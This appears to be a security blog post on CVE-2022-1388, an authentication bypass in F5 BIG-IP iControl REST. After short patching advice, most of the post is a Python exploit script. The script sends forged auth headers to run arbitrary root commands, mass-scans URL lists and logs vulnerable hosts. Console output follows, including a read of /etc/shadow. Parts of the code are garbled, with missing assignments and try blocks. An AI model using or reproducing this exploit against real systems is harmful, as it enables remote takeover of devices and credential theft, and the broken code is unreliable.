top of page

F5 | CVE-2022-1388

A proof of concept (PoC) was developed for a critical vulnerability in F5's BIG-IP networking software that could expose thousands of users to remote control.

The vulnerability, tracked as CVE-2022-1388, could allow an attacker to make undisclosed requests to bypass iControl's REST authentication.

If exploited, an unauthenticated user could get remote code execution (RCE) on an affected device. 👽

Affected Devices

Everything older than version 17. Patches are available for BIG-IP versions 13-16. BIG-IP version 11 and 12 are vulnerable with no available patch.

So what should you do?

Usually, I recommend patching first and later attending to the configuration issues. But in this case, I will swap this order: First, make sure you are not exposing the admin interface. If you can't manage that: Don't try patching. Turn off the device instead. If the configuration interface is safe: Patch!

import os
import sys
import argparse
import urllib3
import requests

headers = {
        "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
        "Content-type": "application/json",
        "Connection": "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
        "X-F5-Auth-Token": "anything",
        "Authorization": "Basic YWRtaW46"}

endpoint = "/mgmt/tm/util/bash"

def usage():
    print("Eg: \n    python3 -u")
    print("    python3 -u httts:// -c 'cat /etc/passwd'")
    print("    python3 -f urls.txt")
def poc(url):
    payload = {"command": "run", "utilCmdArgs": "-c id"}
        res =, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
            print("[+] {} is vulnerable!!!".format(url))
            return True
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
def exp(url, command):
    payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
        res =, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
            return True
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)

if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-c', '--command', type=str,
                        help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    urls = []
                    urls =
                    for url in urls:
                        if poc(url) == True:
                            with open("success.txt", "a+") as f:
                                f.write(url + "\n")
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
            exp(args.url, args.command)


root@DRM:/tmp# python3 -u https://<ip-address>
[+] https://<ip-address> is vulnerable!!!

root@DRM:/tmp# python3 -u https://<ip-address> -c 'id'
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

root@DRM:/tmp# python3 -u https://<ip-address> -c 'cat /etc/shadow'

sha512—Produces a 512-bit digest. The encrypted password starts with $6$.

root@DRM:/tmp# python3 -u https://<ip-address> -c 'tmsh show sys hardware'

Chassis Information
  Maximum MAC Count  1
  Registration Key   -

Hardware Version Information
  Name        cpus
  Type        base-board
  Model       Intel Xeon Processor (Skylake, IBRS)
  Parameters  --            --
              cache size    4096 KB
              cores         24  (physical:24)
              cpu MHz       2194.838
              cpu sockets   24
              cpu stepping  4

  Name  BIG-IP Virtual Edition
  BIOS Revision
  Base MAC       52:54:00:xx:55:ba
  Hypervisor     KVM

System Information
  Type                       Z100
  Chassis Serial             191931f7-0dcb-4d7c-45xe
  Level 200/400 Part
  Switchboard Serial
  Switchboard Part Revision
  Host Board Serial
  Host Board Part Revision

87 views0 comments

Recent Posts

See All

MacOS | Recording a Packet Trace

A packet trace is a record of traffic traveling across the network. It’s useful for investigating complex network problems related to both correctness and performance. Once you start a packet trace on

DNS Guard

Absolutely everything is connected to the internet these days, from TV to smart light bulbs, from mobile devices to smart cars. Given those ads and ad trackers are everywhere on the Internet, a browse

Cyber Security Interview, Q&A

Can you explain the difference between symmetric and asymmetric encryption? When would you use one over the other? Answer: Symmetric encryption uses a single key to both encrypt and decrypt data, whil


bottom of page